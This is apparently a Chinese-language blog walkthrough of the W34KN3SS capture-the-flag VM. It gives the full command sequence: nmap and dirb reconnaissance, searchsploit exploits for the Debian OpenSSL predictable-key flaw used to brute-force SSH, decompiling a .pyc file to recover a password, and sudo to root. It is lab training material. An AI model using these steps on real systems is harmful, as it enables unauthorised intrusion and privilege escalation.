W34KN3SS靶场复现【附代码】(权限提升)

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:AC:8D:F6'

1.2. 端口扫描

nmap 192.168.7.135 -p- -A

1.3. 目录扫描

dirb http://192.168.7.135

1.4. 敏感信息收集

whatweb http://192.168.7.135

2. WEB打点寻找漏洞点

2.1. 进入80页面

1.在端口扫描时发现一个域名，可能需要绑定域名

2.修改hosts文件，绑定域名weakness.jth

windows绑定过程详细请移步；

看文章的2.2到下面这步就哦了，其中ip改为靶机ip；域名改成weakness.jth

《wpscan》免费密钥API申请_wpscan api-CSDN博客

Linux绑定过程详细请移步；【后续打靶需要】

看文章的2.2的第5小点；

DERPNSTINK: 1-打靶渗透【附代码】(权限提升)-CSDN博客

3.访问域名，但是没啥有用的信息，网页源码也是

http://weakness.jth

2.2. 拼接扫描的目录

域名拼接不行，只能用IP，可能靶机限制了只能用IP访问的权限

2.2.1. /upload.php

是一个文件上传页面，title与我们主页的那只兔子尾巴一样，有什么渊源吗？

2.2.2. kali绑定该域名，目录扫描

1.绑定域名

2.扫描目录

dirb http://weakness.jth 

3.拼接/private，将两个文件逐个拼接逐个打开查看

4./files/mykey.pub 是一个疑似连接ssh的密钥文件

http://weakness.jth/private/files/mykey.pub

5./files/mykey.pub，提示密钥的生成方式

http://weakness.jth/private/files/mykey.pub

6.在kali上搜索相关漏洞

searchsploit openssl 0.9.8c-1

查看.txt文件的漏洞解释，并下载.py文件，

searchsploit -x /linux/remote/5622.txt
searchsploit -m /linux/remote/5720.py

2.3. GetShell

1.复制链接下载文件

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
# 放置于kali 解压
tar -jxvf 5622.tar.bz2

2.尝试在kali上远程下载靶机网站的mykey.pub文件

wget http://weakness.jth/private/files/mykey.pub

3.利用5720.py爆破

python2 5720.py ./rsa/2048 192.168.7.135 n30 22
# n30 是兔子尾巴那里的，当作用户名
# 下载的rsa文件./rsa/2048

4.得到密码

4161de56829de2fe64b9055711f531c1-2537
# 在生成的rsa的2048目录下进行ssh连接

3. 权限提升

1.在当前目录下有一个code文件

2.查看文件类型 -> 文件类型为python 2.7 byte-compiled

file code

3.靶机打开临时服务

#靶机开启临时服务
python -m SimpleHTTPServer 8001

4.kali上下载code，修改文件后缀为.pyc，用uncompyle6反编译

#kali下载
wget http://192.168.7.135:8001/code

mv code code.pyc
pip install uncompyle6
# 此处需要设置一下环境变量，
uncompyle6 code.pyc > code.py

复制到本地的txt中好看些，感觉貌似是一个登录凭证

n30:dMASDNB!!#B!#!#33

5.尝试利用上述密码提权 -》拿到root权限

sudo su